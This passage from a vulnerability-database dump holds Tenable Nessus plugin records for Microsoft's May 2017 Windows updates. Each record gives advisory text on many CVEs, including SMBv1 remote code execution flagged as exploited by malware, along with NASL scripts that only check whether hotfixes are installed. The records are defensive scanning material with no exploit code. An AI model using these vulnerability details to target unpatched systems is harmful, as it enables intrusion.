Server Message Block 1.0 (SMBv1) server when\n handling certain requests. 
An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n packet, to disclose sensitive information.\n (CVE-2017-0275)\n\n - An information disclosure vulnerability exists in the\n Microsoft Server Message Block 1.0 (SMBv1) server when\n handling certain requests. An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n packet, to disclose sensitive information.\n (CVE-2017-0276)\n\n - A remote code execution vulnerability exists in the\n Microsoft Server Message Block 1.0 (SMBv1) server when\n handling certain requests. An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n packet, to execute arbitrary code on a target server.\n (CVE-2017-0277)\n\n - A remote code execution vulnerability exists in the\n Microsoft Server Message Block 1.0 (SMBv1) server when\n handling certain requests. An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n packet, to execute arbitrary code on a target server.\n (CVE-2017-0278)\n\n - A remote code execution vulnerability exists in the\n Microsoft Server Message Block 1.0 (SMBv1) server when\n handling certain requests. An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n packet, to execute arbitrary code on a target server.\n (CVE-2017-0279)\n\n - A denial of service vulnerability exists in Microsoft\n Server Message Block (SMB) when handling a specially\n crafted request to the server. 
An unauthenticated,\n remote attacker can exploit this, via a crafted SMB\n request, to cause the system to stop responding.\n (CVE-2017-0280)\");\n # https://support.microsoft.com/en-us/help/4019214/windows-server-2012-update-kb4019214\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?8ae1f0e3\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Security Only update KB4019214 or Cumulative update KB4019216.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2017-0272\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/05/09\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/05/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/05/09\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2022 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\", \"smb_check_rollup.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"smb_reg_query.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = 'MS17-05';\nkbs = make_list(\n '4019214', # 2012 Monthly Rollup\n '4019216' # 2012 Security Rollup\n);\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win8:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\n# Windows 8 EOL\nproductname = get_kb_item_or_exit(\"SMB/ProductName\", exit_code:1);\nif (\"Windows 8\" >< productname) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(exit_on_fail:TRUE, as_share:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif ( smb_check_rollup(os:\"6.2\", sp:0, rollup_date: \"05_2017\", bulletin:bulletin, rollup_kb_list:[4019214,4019216]) )\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-06-16T16:22:04", "description": "The remote Windows 10 version 1507 host is missing security update KB4019474. It is, therefore, affected by multiple vulnerabilities :\n\n - A security bypass vulnerability exists in Internet Explorer due to an unspecified flaw. 
An unauthenticated, remote attacker can exploit this, by convincing a user to visit a specially crafted website, to bypass mixed content warnings and load insecure content (HTTP) from secure locations (HTTPS). (CVE-2017-0064)\n\n - An elevation of privilege vulnerability exists in Windows in the Microsoft DirectX graphics kernel subsystem (dxgkrnl.sys) due to improper handling of objects in memory. A local attacker can exploit this, via a specially crafted application, to execute arbitrary code in an elevated context. (CVE-2017-0077)\n\n - An information disclosure vulnerability exists in the Windows Graphics Device Interface (GDI) due to improper handling of objects in memory. A local attacker can exploit this, via a specially crafted application, to disclose sensitive information. (CVE-2017-0190)\n\n - An elevation of privilege vulnerability exists in Windows Hyper-V due to improper validation of vSMB packet data. An unauthenticated, adjacent attacker can exploit this to gain elevated privileges.\n (CVE-2017-0212)\n\n - An elevation of privilege vulnerability exists in the Windows COM Aggregate Marshaler due to an unspecified flaw. A local attacker can exploit this, via a specially crafted application, to execute arbitrary code with elevated privileges. (CVE-2017-0213)\n\n - An elevation of privilege vulnerability exists in Windows due to improper validation of user-supplied input when loading type libraries. A local attacker can exploit this, via a specially crafted application, to gain elevated privileges. (CVE-2017-0214)\n\n - A remote code execution vulnerability exists in Microsoft Internet Explorer due to improper handling of objects in memory. An unauthenticated, remote attacker can exploit this, by convincing a user to visit a specially crafted website, to execute arbitrary code in the context of the current user. 
(CVE-2017-0222)\n\n - A remote code execution vulnerability exists in Microsoft Internet Explorer due to improper handling of objects in memory. An unauthenticated, remote attacker can exploit this, by convincing a user to visit a specially crafted website, to execute arbitrary code in the context of the current user. (CVE-2017-0226)\n\n - A remote code execution vulnerability exists in Microsoft Edge in the scripting engines due to improper handling of objects in memory. An unauthenticated, remote attacker can exploit this, by convincing a user to visit a specially crafted website or open a specially crafted Microsoft Office document, to execute arbitrary code in the context of the current user. (CVE-2017-0227)\n\n - A remote code execution vulnerability exists in Microsoft browsers in the JavaScript engines due to improper handling of objects in memory. An unauthenticated, remote attacker can exploit this, by convincing a user to visit a specially crafted website or open a specially crafted Microsoft Office document, to execute arbitrary code in the context of the current user. (CVE-2017-0228)\n\n - A remote code execution vulnerability exists in Microsoft browsers in the JavaScript engines due to improper handling of objects in memory. An unauthenticated, remote attacker can exploit this, by convincing a user to visit a specially crafted website or open a specially crafted Microsoft Office document, to execute arbitrary code in the context of the current user. (CVE-2017-0229)\n\n - A spoofing vulnerability exists in Microsoft browsers due to improper rendering of the SmartScreen filter. An unauthenticated, remote attacker can exploit this, via a specially crafted URL, to redirect users to a malicious website that appears to be a legitimate website.\n (CVE-2017-0231)\n\n - An elevation of privilege vulnerability exists in Microsoft Edge due to improper sandboxing. 
An unauthenticated, remote attacker can exploit this to break out of the Edge AppContainer sandbox and gain elevated privileges. (CVE-2017-0233)\n\n - A remote code execution vulnerability exists in Microsoft Edge in the Chakra JavaScript engine due to improper handling of objects in memory. An unauthenticated, remote attacker can exploit this, by convincing a user to visit a specially crafted website or open a specially crafted Microsoft Office document, to execute arbitrary code in the context of the current user. (CVE-2017-0234)\n\n - A remote code execution vulnerability exists in Microsoft Edge in the Chakra JavaScript engine due to improper handling of objects in memory. An unauthenticated, remote attacker can exploit this, by convincing a user to visit a specially crafted website or open a specially crafted Office document, to execute arbitrary code in the context of the current user. (CVE-2017-0236)\n\n - A remote code execution vulnerability exists in Microsoft browsers in the JavaScript scripting engines due to improper handling of objects in memory. An unauthenticated, remote attacker can exploit this, by convincing a user to visit a specially crafted website or open a specially crafted Office document, to execute arbitrary code in the context of the current user. (CVE-2017-0238)\n\n - A remote code execution vulnerability exists in Microsoft Edge in the scripting engines due to improper handling of objects in memory. An unauthenticated, remote attacker can exploit this, by convincing a user to visit a specially crafted website or to open a specially crafted Office document, to execute arbitrary code in the context of the current user. (CVE-2017-0240)\n\n - An elevation of privilege vulnerability exists in Microsoft Edge due to improper rendering of a domain-less page in the URL. 
An unauthenticated, remote attacker can exploit this, by convincing a user to visit a specially crafted website, to cause the user to perform actions in the context of the Intranet Zone and access functionality that is not typically available to the browser when browsing in the context of the Internet Zone. (CVE-2017-0241)\n\n - An elevation of privilege vulnerability exists in the win32k component due to improper handling of objects in memory. A local attacker can exploit this, via a specially crafted application, to execute arbitrary code with elevated permissions. Note that an attacker can also cause a denial of service condition on Windows 7 x64 or later systems. (CVE-2017-0246)\n\n - A security bypass vulnerability exists in the Microsoft .NET Framework and .NET Core components due to a failure to completely validate certificates. An attacker can exploit this to present a certificate that is marked invalid for a specific use, but the component uses it for that purpose, resulting in a bypass of the Enhanced Key Usage taggings. (CVE-2017-0248)\n\n - An information disclosure vulnerability exists in the Windows kernel due to improper initialization of objects in memory. A local attacker can exploit this, via a specially crafted application, to disclose sensitive information. (CVE-2017-0258)\n\n - An information disclosure vulnerability exists in the Windows kernel due to improper initialization of objects in memory. A local attacker can exploit this, via a specially crafted application, to disclose sensitive information. (CVE-2017-0259)\n\n - An elevation of privilege vulnerability exists in the Windows kernel-mode driver due to improper handling of objects in memory. A local attacker can exploit this, via a specially crafted application, to run arbitrary code in kernel mode. (CVE-2017-0263)\n\n - An information disclosure vulnerability exists in the Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. 
An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to disclose sensitive information.\n (CVE-2017-0267)\n\n - An information disclosure vulnerability exists in the Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to disclose sensitive information.\n (CVE-2017-0268)\n\n - A denial of service vulnerability exists in Microsoft Server Message Block (SMB) when handling a specially crafted request to the server. An unauthenticated, remote attacker can exploit this, via a crafted SMB request, to cause the system to stop responding.\n (CVE-2017-0269)\n\n - An information disclosure vulnerability exists in the Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to disclose sensitive information.\n (CVE-2017-0270)\n\n - An information disclosure vulnerability exists in the Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to disclose sensitive information.\n (CVE-2017-0271)\n\n - A remote code execution vulnerability exists in the Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to execute arbitrary code on a target server.\n (CVE-2017-0272)\n\n - A denial of service vulnerability exists in Microsoft Server Message Block (SMB) when handling a specially crafted request to the server. An unauthenticated, remote attacker can exploit this, via a crafted SMB request, to cause the system to stop responding.\n (CVE-2017-0273)\n\n - An information disclosure vulnerability exists in the Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. 
An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to disclose sensitive information.\n (CVE-2017-0274)\n\n - An information disclosure vulnerability exists in the Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to disclose sensitive information.\n (CVE-2017-0275)\n\n - An information disclosure vulnerability exists in the Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to disclose sensitive information.\n (CVE-2017-0276)\n\n - A remote code execution vulnerability exists in the Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to execute arbitrary code on a target server.\n (CVE-2017-0277)\n\n - A remote code execution vulnerability exists in the Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to execute arbitrary code on a target server.\n (CVE-2017-0278)\n\n - A remote code execution vulnerability exists in the Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to execute arbitrary code on a target server.\n (CVE-2017-0279)\n\n - A denial of service vulnerability exists in Microsoft Server Message Block (SMB) when handling a specially crafted request to the server. 
An unauthenticated, remote attacker can exploit this, via a crafted SMB request, to cause the system to stop responding.\n (CVE-2017-0280)", "cvss3": {"score": 8.1, "vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2017-05-09T00:00:00", "type": "nessus", "title": "KB4019474: Windows 10 Version 1507 May 2017 Cumulative Update", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-0064", "CVE-2017-0077", "CVE-2017-0190", "CVE-2017-0212", "CVE-2017-0213", "CVE-2017-0214", "CVE-2017-0222", "CVE-2017-0226", "CVE-2017-0227", "CVE-2017-0228", "CVE-2017-0229", "CVE-2017-0231", "CVE-2017-0233", "CVE-2017-0234", "CVE-2017-0236", "CVE-2017-0238", "CVE-2017-0240", "CVE-2017-0241", "CVE-2017-0246", "CVE-2017-0248", "CVE-2017-0258", "CVE-2017-0259", "CVE-2017-0263", "CVE-2017-0267", "CVE-2017-0268", "CVE-2017-0269", "CVE-2017-0270", "CVE-2017-0271", "CVE-2017-0272", "CVE-2017-0273", "CVE-2017-0274", "CVE-2017-0275", "CVE-2017-0276", "CVE-2017-0277", "CVE-2017-0278", "CVE-2017-0279", "CVE-2017-0280"], "modified": "2022-03-29T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS17_MAY_4019474.NASL", "href": "https://www.tenable.com/plugins/nessus/100061", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(100061);\n script_version(\"1.15\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/03/29\");\n\n script_cve_id(\n \"CVE-2017-0064\",\n \"CVE-2017-0077\",\n \"CVE-2017-0190\",\n \"CVE-2017-0212\",\n \"CVE-2017-0213\",\n \"CVE-2017-0214\",\n \"CVE-2017-0222\",\n \"CVE-2017-0226\",\n \"CVE-2017-0227\",\n \"CVE-2017-0228\",\n \"CVE-2017-0229\",\n \"CVE-2017-0231\",\n \"CVE-2017-0233\",\n \"CVE-2017-0234\",\n \"CVE-2017-0236\",\n \"CVE-2017-0238\",\n \"CVE-2017-0240\",\n \"CVE-2017-0241\",\n \"CVE-2017-0246\",\n \"CVE-2017-0248\",\n \"CVE-2017-0258\",\n \"CVE-2017-0259\",\n 
\"CVE-2017-0263\",\n \"CVE-2017-0267\",\n \"CVE-2017-0268\",\n \"CVE-2017-0269\",\n \"CVE-2017-0270\",\n \"CVE-2017-0271\",\n \"CVE-2017-0272\",\n \"CVE-2017-0273\",\n \"CVE-2017-0274\",\n \"CVE-2017-0275\",\n \"CVE-2017-0276\",\n \"CVE-2017-0277\",\n \"CVE-2017-0278\",\n \"CVE-2017-0279\",\n \"CVE-2017-0280\"\n );\n script_bugtraq_id(\n 98099,\n 98102,\n 98103,\n 98108,\n 98112,\n 98113,\n 98114,\n 98117,\n 98121,\n 98127,\n 98139,\n 98164,\n 98173,\n 98179,\n 98203,\n 98208,\n 98217,\n 98229,\n 98234,\n 98237,\n 98258,\n 98259,\n 98260,\n 98261,\n 98263,\n 98264,\n 98265,\n 98266,\n 98267,\n 98268,\n 98270,\n 98271,\n 98272,\n 98273,\n 98274,\n 98281,\n 98298\n );\n script_xref(name:\"MSKB\", value:\"4019474\");\n script_xref(name:\"MSFT\", value:\"MS17-4019474\");\n script_xref(name:\"IAVA\", value:\"2017-A-0148\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/08/10\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/08/25\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/04/18\");\n\n script_name(english:\"KB4019474: Windows 10 Version 1507 May 2017 Cumulative Update\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows 10 version 1507 host is missing security update\nKB4019474. It is, therefore, affected by multiple vulnerabilities :\n\n - A security bypass vulnerability exists in Internet\n Explorer due to an unspecified flaw. An unauthenticated,\n remote attacker can exploit this, by convincing a user\n to visit a specially crafted website, to bypass mixed\n content warnings and load insecure content (HTTP) from\n secure locations (HTTPS). (CVE-2017-0064)\n\n - An elevation of privilege vulnerability exists in\n Windows in the Microsoft DirectX graphics kernel\n subsystem (dxgkrnl.sys) due to improper handling of\n objects in memory. 
A local attacker can exploit this,\n via a specially crafted application, to execute\n arbitrary code in an elevated context. (CVE-2017-0077)\n\n - An information disclosure vulnerability exists in the\n Windows Graphics Device Interface (GDI) due to improper\n handling of objects in memory. A local attacker can\n exploit this, via a specially crafted application, to\n disclose sensitive information. (CVE-2017-0190)\n\n - An elevation of privilege vulnerability exists in\n Windows Hyper-V due to improper validation of vSMB\n packet data. An unauthenticated, adjacent attacker can\n exploit this to gain elevated privileges.\n (CVE-2017-0212)\n\n - An elevation of privilege vulnerability exists in the\n Windows COM Aggregate Marshaler due to an unspecified\n flaw. A local attacker can exploit this, via a specially\n crafted application, to execute arbitrary code with\n elevated privileges. (CVE-2017-0213)\n\n - An elevation of privilege vulnerability exists in\n Windows due to improper validation of user-supplied\n input when loading type libraries. A local attacker can\n exploit this, via a specially crafted application, to\n gain elevated privileges. (CVE-2017-0214)\n\n - A remote code execution vulnerability exists in\n Microsoft Internet Explorer due to improper handling of\n objects in memory. An unauthenticated, remote attacker\n can exploit this, by convincing a user to visit a\n specially crafted website, to execute arbitrary code in\n the context of the current user. (CVE-2017-0222)\n\n - A remote code execution vulnerability exists in\n Microsoft Internet Explorer due to improper handling of\n objects in memory. An unauthenticated, remote attacker\n can exploit this, by convincing a user to visit a\n specially crafted website, to execute arbitrary code in\n the context of the current user. (CVE-2017-0226)\n\n - A remote code execution vulnerability exists in\n Microsoft Edge in the scripting engines due to improper\n handling of objects in memory. 
An unauthenticated,\n remote attacker can exploit this, by convincing a user\n to visit a specially crafted website or open a specially\n crafted Microsoft Office document, to execute arbitrary\n code in the context of the current user. (CVE-2017-0227)\n\n - A remote code execution vulnerability exists in\n Microsoft browsers in the JavaScript engines due to\n improper handling of objects in memory. An\n unauthenticated, remote attacker can exploit this, by\n convincing a user to visit a specially crafted website\n or open a specially crafted Microsoft Office document,\n to execute arbitrary code in the context of the current\n user. (CVE-2017-0228)\n\n - A remote code execution vulnerability exists in\n Microsoft browsers in the JavaScript engines due to\n improper handling of objects in memory. An\n unauthenticated, remote attacker can exploit this, by\n convincing a user to visit a specially crafted website\n or open a specially crafted Microsoft Office document,\n to execute arbitrary code in the context of the current\n user. (CVE-2017-0229)\n\n - A spoofing vulnerability exists in Microsoft browsers\n due to improper rendering of the SmartScreen filter. An\n unauthenticated, remote attacker can exploit this, via a\n specially crafted URL, to redirect users to a malicious\n website that appears to be a legitimate website.\n (CVE-2017-0231)\n\n - An elevation of privilege vulnerability exists in\n Microsoft Edge due to improper sandboxing. An\n unauthenticated, remote attacker can exploit this to\n break out of the Edge AppContainer sandbox and gain\n elevated privileges. (CVE-2017-0233)\n\n - A remote code execution vulnerability exists in\n Microsoft Edge in the Chakra JavaScript engine due to\n improper handling of objects in memory. 
An\n unauthenticated, remote attacker can exploit this, by\n convincing a user to visit a specially crafted website\n or open a specially crafted Microsoft Office document,\n to execute arbitrary code in the context of the current\n user. (CVE-2017-0234)\n\n - A remote code execution vulnerability exists in\n Microsoft Edge in the Chakra JavaScript engine due to\n improper handling of objects in memory. An\n unauthenticated, remote attacker can exploit this, by\n convincing a user to visit a specially crafted website\n or open a specially crafted Office document, to\n execute arbitrary code in the context of the current\n user. (CVE-2017-0236)\n\n - A remote code execution vulnerability exists in\n Microsoft browsers in the JavaScript scripting engines\n due to improper handling of objects in memory. An\n unauthenticated, remote attacker can exploit this, by\n convincing a user to visit a specially crafted website\n or open a specially crafted Office document, to\n execute arbitrary code in the context of the current\n user. (CVE-2017-0238)\n\n - A remote code execution vulnerability exists in\n Microsoft Edge in the scripting engines due to improper\n handling of objects in memory. An unauthenticated,\n remote attacker can exploit this, by convincing a user\n to visit a specially crafted website or to open a\n specially crafted Office document, to execute arbitrary\n code in the context of the current user. (CVE-2017-0240)\n\n - An elevation of privilege vulnerability exists in\n Microsoft Edge due to improper rendering of a\n domain-less page in the URL. An unauthenticated, remote\n attacker can exploit this, by convincing a user to visit\n a specially crafted website, to cause the user to\n perform actions in the context of the Intranet Zone and\n access functionality that is not typically available to\n the browser when browsing in the context of the Internet\n Zone. 
(CVE-2017-0241)\n\n - An elevation of privilege vulnerability exists in the\n win32k component due to improper handling of objects in\n memory. A local attacker can exploit this, via a\n specially crafted application, to execute arbitrary code\n with elevated permissions. Note that an attacker can\n also cause a denial of service condition on Windows 7\n x64 or later systems. (CVE-2017-0246)\n\n - A security bypass vulnerability exists in the Microsoft\n .NET Framework and .NET Core components due to a failure\n to completely validate certificates. An attacker can\n exploit this to present a certificate that is marked\n invalid for a specific use, but the component uses it\n for that purpose, resulting in a bypass of the Enhanced\n Key Usage taggings. (CVE-2017-0248)\n\n - An information disclosure vulnerability exists in the\n Windows kernel due to improper initialization of objects\n in memory. A local attacker can exploit this, via a\n specially crafted application, to disclose sensitive\n information. (CVE-2017-0258)\n\n - An information disclosure vulnerability exists in the\n Windows kernel due to improper initialization of objects\n in memory. A local attacker can exploit this, via a\n specially crafted application, to disclose sensitive\n information. (CVE-2017-0259)\n\n - An elevation of privilege vulnerability exists in the\n Windows kernel-mode driver due to improper handling of\n objects in memory. A local attacker can exploit this,\n via a specially crafted application, to run arbitrary\n code in kernel mode. (CVE-2017-0263)\n\n - An information disclosure vulnerability exists in the\n Microsoft Server Message Block 1.0 (SMBv1) server when\n handling certain requests. An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n packet, to disclose sensitive information.\n (CVE-2017-0267)\n\n - An information disclosure vulnerability exists in the\n Microsoft Server Message Block 1.0 (SMBv1) server when\n handling certain requests. 
An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n packet, to disclose sensitive information.\n (CVE-2017-0268)\n\n - A denial of service vulnerability exists in Microsoft\n Server Message Block (SMB) when handling a specially\n crafted request to the server. An unauthenticated,\n remote attacker can exploit this, via a crafted SMB\n request, to cause the system to stop responding.\n (CVE-2017-0269)\n\n - An information disclosure vulnerability exists in the\n Microsoft Server Message Block 1.0 (SMBv1) server when\n handling certain requests. An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n packet, to disclose sensitive information.\n (CVE-2017-0270)\n\n - An information disclosure vulnerability exists in the\n Microsoft Server Message Block 1.0 (SMBv1) server when\n handling certain requests. An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n packet, to disclose sensitive information.\n (CVE-2017-0271)\n\n - A remote code execution vulnerability exists in the\n Microsoft Server Message Block 1.0 (SMBv1) server when\n handling certain requests. An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n packet, to execute arbitrary code on a target server.\n (CVE-2017-0272)\n\n - A denial of service vulnerability exists in Microsoft\n Server Message Block (SMB) when handling a specially\n crafted request to the server. An unauthenticated,\n remote attacker can exploit this, via a crafted SMB\n request, to cause the system to stop responding.\n (CVE-2017-0273)\n\n - An information disclosure vulnerability exists in the\n Microsoft Server Message Block 1.0 (SMBv1) server when\n handling certain requests. 
An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n packet, to disclose sensitive information.\n (CVE-2017-0274)\n\n - An information disclosure vulnerability exists in the\n Microsoft Server Message Block 1.0 (SMBv1) server when\n handling certain requests. An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n packet, to disclose sensitive information.\n (CVE-2017-0275)\n\n - An information disclosure vulnerability exists in the\n Microsoft Server Message Block 1.0 (SMBv1) server when\n handling certain requests. An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n packet, to disclose sensitive information.\n (CVE-2017-0276)\n\n - A remote code execution vulnerability exists in the\n Microsoft Server Message Block 1.0 (SMBv1) server when\n handling certain requests. An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n packet, to execute arbitrary code on a target server.\n (CVE-2017-0277)\n\n - A remote code execution vulnerability exists in the\n Microsoft Server Message Block 1.0 (SMBv1) server when\n handling certain requests. An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n packet, to execute arbitrary code on a target server.\n (CVE-2017-0278)\n\n - A remote code execution vulnerability exists in the\n Microsoft Server Message Block 1.0 (SMBv1) server when\n handling certain requests. An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n packet, to execute arbitrary code on a target server.\n (CVE-2017-0279)\n\n - A denial of service vulnerability exists in Microsoft\n Server Message Block (SMB) when handling a specially\n crafted request to the server. 
An unauthenticated,\n remote attacker can exploit this, via a crafted SMB\n request, to cause the system to stop responding.\n (CVE-2017-0280)\");\n # https://support.microsoft.com/en-us/help/4019474/windows-10-update-kb4019474\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?01ec841b\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply security update KB4019474.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2017-0272\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/05/09\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/05/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/05/09\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2022 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"smb_reg_query.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = 'MS17-05';\nkbs = make_list(\n '4019474' # 10 1507\n);\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nproductname = get_kb_item_or_exit(\"SMB/ProductName\", exit_code:1);\nif (\"2016\" >< productname) audit(AUDIT_OS_SP_NOT_VULN);\n\nif (\n # 10 (1507)\n smb_check_rollup(os:\"10\",\n sp:0,\n os_build:\"10240\",\n rollup_date: \"05_2017\",\n bulletin:bulletin,\n rollup_kb_list:kbs)\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-03-30T17:09:27", "description": "The remote Windows host is missing security update 4019263 or cumulative update 4019264. It is, therefore, affected by multiple vulnerabilities :\n\n - A denial of service vulnerability exists in the Windows DNS server when it's configured to answer version queries. An unauthenticated, remote attacker can exploit this, via a malicious DNS query, to cause the DNS server to become nonresponsive. 
